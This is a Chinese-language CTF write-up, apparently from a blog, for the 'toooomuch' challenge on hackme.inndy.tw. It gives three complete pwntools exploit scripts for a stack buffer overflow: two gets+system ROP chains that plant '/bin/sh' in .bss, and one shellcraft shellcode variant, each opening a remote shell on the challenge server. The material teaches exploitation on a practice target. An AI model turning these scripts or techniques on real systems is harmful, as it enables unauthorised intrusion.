checksec一下,发现啥保护也没有,不需要再找libc的版本了
这里的漏洞点在toomuch1中说过了
在toooomuch函数中,覆盖0x18+4个值,即可达到溢出效果
下一步目标是:将"/bin/sh"写入bss段中,然后执行system函数即可
类似x64平台,在x86中也有相似的通用gadgets
exp1:
利用gets+system:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#io = process("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
elf = ELF("./toooomuch")
gets = elf.symbols['gets']
log.info("gets_addr = " + str(hex(gets)))
bss = elf.bss()
log.info("bss_addr = " + str(hex(bss)))
pr = 0x804889B
system_plt = 0x080484C0
payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(system_plt) + p32(pr) + p32(bss) + p32(0xABCD)
io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()
exp2:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#io = process("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
elf = ELF("./toooomuch")
gets = elf.symbols['gets']
log.info("gets_addr = " + str(hex(gets)))
bss = elf.bss()
log.info("bss_addr = " + str(hex(bss)))
pr = 0x804889B
system = 0x8048649
payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(system) + p32(bss) + p32(0xABCD)
io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()
分析一下:
exp1和exp2的不同点:exp1中,调用的是system_plt,没有pop—ret指令,即没有返回地址,所以要自己构造
exp2中,调用的是函数中的对system的调用,之后有pop和retn,即有恢复堆栈
单步调试即可看到区别
exp3:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
elf = ELF("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
gets = elf.symbols['gets']
bss = elf.bss()
log.info("gets addr = " + str(hex(gets)))
log.info("bss addr = " + str(hex(bss)))
payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(bss) + p32(bss)
io.recvuntil("passcode: ")
io.sendline(payload)
io.sendline(asm(shellcraft.sh()))
io.interactive()
京公网安备 11010502036488号